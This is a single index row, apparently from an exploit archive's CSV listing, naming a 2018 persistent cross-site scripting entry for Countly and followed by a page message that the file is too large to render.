45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,

Can't render this file because it is too large.